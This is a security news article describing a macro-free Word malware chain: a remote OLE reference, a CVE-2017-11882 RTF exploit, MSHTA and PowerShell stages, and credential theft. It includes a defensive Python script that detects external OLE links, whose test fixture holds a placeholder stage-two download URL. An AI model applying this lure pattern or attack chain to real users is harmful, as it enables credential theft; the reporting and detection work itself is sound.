New threat vector: Latest Microsoft Word malware doesn’t use macros to unleash attack

A popular method of infecting users with malware has been Microsoft Office documents loaded with malicious macros. Chief among these are Microsoft Word documents, since victims are easily social-engineered into downloading them. The main reason attackers favor Office documents is the exploitable nature of macros, which is why macros are disabled by default, though a user can choose to enable them. A new Microsoft Word malware attack, however, shows that macros are not necessary to infect a machine. Research from the security company Trustwave details a macro-free malware attack delivered via Word documents in email attachments. The goal of the attack is to steal the unsuspecting user’s credentials from email clients, FTP clients, and browsers via a “multi-stage email Word attack.”

The attack has four stages, which are as follows (with direct quotes from the Trustwave report):

  1. The .docx file (created with Word 2007) is opened, and this “allows external access to remote OLE objects to be referenced in the document.xml.rels”
  2. An RTF file download is triggered; the RTF file is then executed and leverages an exploit (CVE-2017-11882) that targets the Microsoft Equation Editor tool.
  3. The RTF file will “execute an MSHTA command line which downloads and executes a remote HTA file. The HTA file contains VBScript... By decoding each character code in VBScript, it reveals a PowerShell Script which eventually ... executes a remote binary file.”
  4. The malicious payload is executed, stealing credentials “by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist.”
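
Stage 1 hinges on a relationship in word/_rels/document.xml.rels whose target lives outside the document package. As an added detection example (not code from the article or from Trustwave), the script below unzips a .docx and reports OLE relationships marked TargetMode="External", which a mail gateway or triage script can use to flag such attachments before they reach a user; the sample documents and the stage-two URL are constructed placeholders, not indicators from the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship namespace and the relationship type used for OLE objects.
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
RELS_PART = "word/_rels/document.xml.rels"

def external_ole_targets(docx_bytes):
    """Return Target values of OLE relationships marked TargetMode="External".
    A normal embedded OLE object points at an internal part such as
    embeddings/oleObject1.bin; an external target is fetched when opened."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(RELS_PART))
    return [
        rel.get("Target")
        for rel in root.iter(f"{{{PKG_NS}}}Relationship")
        if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External"
    ]

def build_sample_docx(rels_xml):
    """Construct a minimal .docx-shaped zip around the given rels part (fixture only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PART, rels_xml)
    return buf.getvalue()

# Constructed sample: an external OLE reference next to an ordinary styles link.
# The URL is a placeholder, not an indicator from the report.
SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="http://example.invalid/stage2.rtf" TargetMode="External"/>
</Relationships>"""

# Constructed benign sample: the OLE object is embedded inside the package.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""
```

A relationship without TargetMode defaults to Internal, so only an explicit External mode is reported.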

The only defense against this particular Word malware is to practice common-sense cybersecurity strategies. Be wary of any email that comes from unknown sources, and most importantly, do not download any document unless you are absolutely certain that it is necessary.

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.
